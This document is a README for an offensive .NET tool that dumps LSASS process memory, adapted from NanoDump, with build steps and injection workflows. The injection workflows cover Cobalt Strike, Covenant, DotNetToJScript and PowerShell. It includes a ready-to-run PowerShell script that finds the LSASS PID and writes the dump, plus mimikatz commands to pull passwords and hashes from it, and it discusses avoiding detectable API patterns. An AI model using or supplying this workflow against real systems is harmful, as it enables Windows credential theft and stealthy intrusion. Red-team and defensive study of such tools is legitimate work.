.NET injectable LSASS dumper, adapted from NanoDump
The goal of this project is to provide a .NET CLR injectable LSASS process dumping capability that avoids calling the Win32 API MiniDumpWriteDump() (and the Win32 API usage patterns associated with it).
- Developed in Visual C++ with CLR support
- Reduced size LSASS dump (similar to NanoDump)
- Compiler intrinsics removed to accommodate Pure CLR compilation
- Pre-configured to support injection via:
  - Assembly.Load() (e.g. Cobalt Strike "execute-assembly" and Covenant "Assembly" commands)
  - DotNetToJScript/GadgetToJscript COM-based memory stream injection
  - PowerShell non-GAC type import (Add-Type)
  - Binary execution
<insert clone command>
This project was implemented with Visual Studio 2015, but should build with any Visual Studio version that can compile C++/CLI (Visual C++ with CLR support). Building the solution generates both a binary executable and a .NET class library.
Build -> Build Solution
or
CTRL+SHIFT+B
This project was largely adapted to fill a gap within Covenant C2. Pass the LSASS PID and the output path as the two parameters:
Assembly /assemblyname:"\"" /parameters:"620 dump.dmp"
Although you can use this payload with execute-assembly, you may have better luck with the BOF-based projects referenced below.
execute-assembly /path/to/binary <PID> <DUMPFILE>
MiniDumpDotNet can be integrated into both DotNetToJScript and GadgetToJscript workflows:
Download and build the DotNetToJScript project in Visual Studio. Then use the generator to create the payload minidumpdotnet.js.
DotNetToJScript\DotNetToJScript\bin\Debug\DotNetToJScript.exe -d -v v4 -l JScript -o minidumpdotnet.js -c MiniDump.MiniDump MiniDumpDotNet\minidumpdotnet.dll
Update minidumpdotnet.js so that the entry point calls the dumper with the PID of the LSASS process and the output path: o.DumpPid(620, "dump.dmp");
cscript minidumpdotnet.js
PowerShell can load the class library directly with Add-Type (no GAC installation required) and call the dumper from an elevated session.
[string]$assemblyPath = ".\minidumpdotnet.dll"
Add-Type -Path $assemblyPath
[MiniDump.MiniDump]$a = New-Object -TypeName 'MiniDump.MiniDump'
$a.DumpPid(620, "dump.dmp")
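As an added example (not code from the MiniDumpDotNet project), the PowerShell script below wraps the same Add-Type / DumpPid() calls in a form that resolves the lsass.exe PID at run time instead of hard-coding it, refuses to run from a non-elevated session (opening LSASS needs SeDebugPrivilege, which only an elevated token carries), and checks that the output file starts with the standard "MDMP" minidump signature. The assembly path, output file name and the DumpPid(int, string) signature are taken from the README above; the elevation check, the PID lookup and the post-dump verification are assumptions about how a practitioner would wrap the tool, not features of the project.

```powershell
# Added example, not part of MiniDumpDotNet. Assumes minidumpdotnet.dll is in the
# current directory and exposes MiniDump.MiniDump::DumpPid(int pid, string path)
# exactly as used in the README.
param(
    [string]$AssemblyPath = '.\minidumpdotnet.dll',
    [string]$OutFile      = (Join-Path (Get-Location) 'dump.dmp')
)

# Opening a handle to LSASS requires SeDebugPrivilege; only an elevated
# (high-integrity) token has it, so fail early instead of after a confusing error.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    throw 'Run this from an elevated PowerShell session.'
}

# Resolve the PID instead of hard-coding 620. Exactly one lsass.exe is expected;
# anything else (0 or >1) is suspicious enough to stop.
$lsass = @(Get-Process -Name lsass -ErrorAction Stop)
if ($lsass.Count -ne 1) { throw "Expected one lsass process, found $($lsass.Count)." }
$lsassPid = [int]$lsass[0].Id   # $PID is reserved for the current process, so use another name

# Load the class library without GAC installation and run the dump.
Add-Type -Path $AssemblyPath
$dumper = New-Object -TypeName 'MiniDump.MiniDump'
$dumper.DumpPid($lsassPid, $OutFile)

# Verify the result. A minidump begins with the ASCII signature 'MDMP'. This port
# dropped NanoDump's header-corruption option, so a valid signature is expected;
# a tool that deliberately corrupts the header would trip this warning by design.
if (-not (Test-Path -LiteralPath $OutFile)) { throw "No dump written to $OutFile." }
$bytes = [System.IO.File]::ReadAllBytes($OutFile)
if ($bytes.Length -lt 4) { throw "Dump file $OutFile is empty or truncated." }
$sig = [System.Text.Encoding]::ASCII.GetString($bytes, 0, 4)
if ($sig -ne 'MDMP') {
    Write-Warning "Unexpected signature '$sig' at start of $OutFile"
} else {
    Write-Host ("Wrote {0} bytes to {1} from PID {2}" -f $bytes.Length, $OutFile, $lsassPid)
}
```

The file produced this way is consumed by mimikatz's sekurlsa::minidump exactly as shown in the credential extraction section; the signature check is only a quick sanity test that the dumper ran to completion, not a guarantee that every memory region mimikatz needs was captured.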
When all else fails, native execution of the built binary is worth a shot (same arguments: LSASS PID, then output file).
minidumpdotnet.exe 620 dump.dmp
Extracting credentials (or hashes) from the dump is performed just as with any other minidump of LSASS, for example offline with mimikatz:
mimikatz.exe
sekurlsa::minidump dump.dmp
sekurlsa::logonPasswords
Many of the opsec-specific features from NanoDump (e.g. SysWhispers direct syscalls, handle duplication, the corrupted MiniDump header, etc.) were removed to produce this first pass of the project; some of them may be reintroduced at a later date. Additionally, the resulting source code was reorganized, and various Windows structures, enums and constants were redefined locally to avoid include conflicts under CLR compilation.
- The developers at HelpSystems for the NanoDump project
- rooku for the BOFs project, which contains a general purpose reimplementation of MiniDumpWriteDump based on ReactOS
- The developers for ReactOS for providing reference code for the MiniDumpWriteDump API
- All other developers of the amazing offensive security products and tools mentioned above